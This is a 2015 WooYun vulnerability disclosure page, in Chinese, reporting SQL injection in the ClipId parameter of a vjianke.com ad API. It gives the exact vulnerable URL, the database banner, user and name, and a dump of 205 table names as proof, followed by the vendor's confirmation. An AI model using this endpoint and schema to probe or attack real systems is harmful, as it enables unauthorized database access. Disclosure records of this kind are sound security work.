剪客网一处SQL注入 | wooyun-2015-0139935| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139935

漏洞标题：剪客网一处SQL注入

漏洞作者：路人甲

提交时间：2015-09-09 14:24

修复时间：2015-10-24 15:58

公开时间：2015-10-24 15:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-09：细节已通知厂商并且等待厂商处理中
2015-09-09：厂商已经确认，细节仅向厂商公开
2015-09-19：细节向核心白帽子及相关领域专家公开
2015-09-29：细节向普通白帽子公开
2015-10-09：细节向实习白帽子公开
2015-10-24：细节向公众公开

简要描述：

callback中的注入

详细说明：

http://www.vjianke.com/api/ad/get?callback=jQuery16206296576291788369_1441764661807&format=json&ownerguid=8b6257c9505548febabc9eec005a94d2&platform=0&ClipId=ZLJUT&_=1441764661981

其中参数ClipId存在注入

banner: 'Microsoft SQL Azure (RTM) - 11.0.9231.13 \n\tJul 15 2015 11:58:32 \n\tCopyright (c) Microsoft Corporation\n'
current user: 'eachcloud'
current database: 'demo1'

漏洞证明：

Database: demo1
[205 tables]
+---------------------------------------------+
| AdClickHistoryEntity                        |
| AdEntity                                    |
| AdKaixinEntity                              |
| AdTemplateEntity                            |
| AdViewHistoryEntity                         |
| AndroidDeviceEntity                         |
| AppAdEntity                                 |
| AppBackgroundEntity                         |
| AppBoardMappingEntity                       |
| AppCodeEntity_copy                          |
| AppCodeEntity_copy                          |
| AppDownloadCountEntity                      |
| AppInfoEntity_copy                          |
| AppInfoEntity_copy                          |
| AppSubscribeEntity                          |
| ApplyEntity                                 |
| BoardClipEntity                             |
| BoardEntity                                 |
| BoardFollowerEntity                         |
| BoardInvitationEntity                       |
| BoardRssEntity                              |
| BoardTagMappingEntity                       |
| ClickEntity                                 |
| ClickOnPageHistoryLogEntity                 |
| ClientEntity                                |
| ClipEntity                                  |
| ClipRequestClient                           |
| ClipRequestWeb                              |
| ClipScheduleEntity                          |
| ClipTagEntity                               |
| ClipTaskHistoryEntity                       |
| ClipWithWeiboCommentEntity                  |
| CollectEntity                               |
| CommentEntity                               |
| ContributionEntity                          |
| CookieLog                                   |
| DeviceRequestEntity                         |
| DocEntity                                   |
| DocPublishEntity                            |
| EditorDailyWorkEntity                       |
| EditorEntity_copy                           |
| EditorEntity_copy                           |
| EditorWorkLevelEntity                       |
| EditorWorkPointEntity                       |
| EmployeeTreeTable                           |
| EventUserEntity                             |
| FameEntity                                  |
| FameMicroBlogEntity                         |
| FameTranslatorEntity                        |
| FameUserEntity                              |
| FollowerEntity                              |
| GameAwardEntity                             |
| GetAppInfoReqEntity                         |
| GetAppListReqEntity                         |
| GetFeedHomeReqEntity                        |
| GuidToPanamaUserEntity                      |
| HilightMarkEntity                           |
| IISLogEntity                                |
| InviteCodeCreateHistoryEntity               |
| InviteCodeEntity                            |
| InviteCodeHistoryEntity                     |
| IpCountryEntity                             |
| JiankeUserEntity                            |
| KaiXinExperiencedUser                       |
| LangSkillSetEntity                          |
| LikeEntity                                  |
| LongTweetPublishEntity                      |
| MainboardClipEntity                         |
| MarkCommentEntity                           |
| MarkCommentVie                              |
| MicroBlogSiteEntity                         |
| NewYear2013Entity                           |
| NotificationEntity                          |
| PanamaUserEntity                            |
| PersistLogRecEntity_copy1                   |
| PersistLogRecEntity_copy1                   |
| PersistLogRecEntity_copy1                   |
| PicRulesEntity                              |
| PopularClipEntity                           |
| PopularUser                                 |
| ReclipEntity                                |
| RecommendAppEntity                          |
| RecommendUserEntity                         |
| ResetPwdRquestEntity                        |
| RssSourceEntity                             |
| SearchHistoryLogEntity                      |
| SearchTextEntity                            |
| SystemConfigEntity                          |
| TagBoardEntity                              |
| TagLongTweetEntityBak                       |
| TagLongTweetEntity_copy                     |
| TagLongTweetEntity_copy                     |
| TagTest                                     |
| TempQueueEntity                             |
| TempUserEntity                              |
| TranslatorSkillSetEntity                    |
| TranslatorUserEntity                        |
| TweetFeedEntity                             |
| TweetTranslationPublishEntity               |
| UnLikeClipEntity                            |
| UploadDocTempStorageEntity                  |
| UserBoardCheckEntity                        |
| UserBoardEntity                             |
| UserBoardSimilarityEntity                   |
| UserBooleanPreference_TrainedByViewToEndTag |
| UserClipRecomEntity                         |
| UserClipRecomSourceEntity                   |
| UserClipScoreEntity                         |
| UserEntity                                  |
| UserLoginReqEntity                          |
| UserMicroBlogEntityBak                      |
| UserMicroBlogEntityBak                      |
| UserPointEntity                             |
| UserScoreLotteryHistoryRecordEntity         |
| UserSessionEntity                           |
| UserWordProfileEntity                       |
| VFanStatusEntity                            |
| ViewHistoryLogEntity                        |
| VoteEntity                                  |
| VoteLogEntity                               |
| WeiboCommentEntity                          |
| WeixinBoardEntity                           |
| WeixinCategoryEntity                        |
| aspnet_Applications                         |
| aspnet_Membership_copy                      |
| aspnet_Membership_copy                      |
| aspnet_Paths                                |
| aspnet_PersonalizationAllUsers              |
| aspnet_PersonalizationPerUser               |
| aspnet_Profile                              |
| aspnet_Roles                                |
| aspnet_SchemaVersions                       |
| aspnet_UsersInRoles                         |
| aspnet_UsersInRoles                         |
| aspnet_WebEvent_Events                      |
| category                                    |
| points_2011_07                              |
| points_2011_08                              |
| points_2011_09                              |
| points_2011_10                              |
| points_2011_11                              |
| points_2011_12                              |
| points_2012_01                              |
| points_2012_02                              |
| points_2012_03                              |
| points_2012_04                              |
| points_2012_05                              |
| points_2012_06                              |
| points_2012_07                              |
| points_2012_08                              |
| points_2012_09                              |
| points_2012_10                              |
| points_2012_11                              |
| points_2012_12                              |
| points_2013_01                              |
| points_2013_02                              |
| points_2013_03                              |
| points_2013_04                              |
| points_2013_05                              |
| points_2013_06                              |
| points_2013_07                              |
| points_2013_08                              |
| points_2013_09                              |
| points_2013_10                              |
| points_2013_11                              |
| points_2013_12                              |
| points_2014_01                              |
| points_2014_02                              |
| points_2014_03                              |
| points_2014_04                              |
| points_2014_05                              |
| points_2014_06                              |
| points_2014_07                              |
| points_2014_08                              |
| points_2014_09                              |
| points_2014_10                              |
| points_2014_11                              |
| points_2014_12                              |
| points_2015_01                              |
| points_2015_02                              |
| points_2015_03                              |
| points_2015_04                              |
| points_2015_05                              |
| points_2015_06                              |
| points_2015_07                              |
| points_2015_08                              |
| points_2015_09                              |
| points_2015_10                              |
| points_2015_11                              |
| points_2015_12                              |
| top_points_2011_07                          |
| top_translator_view_2011_07                 |
| vw_aspnet_Applications                      |
| vw_aspnet_MembershipUsers                   |
| vw_aspnet_Profiles                          |
| vw_aspnet_Roles                             |
| vw_aspnet_UsersInRoles                      |
| vw_aspnet_UsersInRoles                      |
| vw_aspnet_WebPartState_Paths                |
| vw_aspnet_WebPartState_Shared               |
| vw_aspnet_WebPartState_User                 |
| eachcloudreporter.provision_marker_dss      |
| eachcloudreporter.schema_info_dss           |
| eachcloudreporter.scope_config_dss          |
| eachcloudreporter.scope_info_dss            |
+---------------------------------------------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-09-09 15:56

厂商回复：

多谢关注和帮忙

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139935

漏洞标题：剪客网一处SQL注入

相关厂商：vjianke.com

漏洞作者：路人甲

提交时间：2015-09-09 14:24

修复时间：2015-10-24 15:58

公开时间：2015-10-24 15:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0139935

漏洞标题：剪客网一处SQL注入

相关厂商：vjianke.com

漏洞作者： 路人甲

提交时间：2015-09-09 14:24

修复时间：2015-10-24 15:58

公开时间：2015-10-24 15:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0139935"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云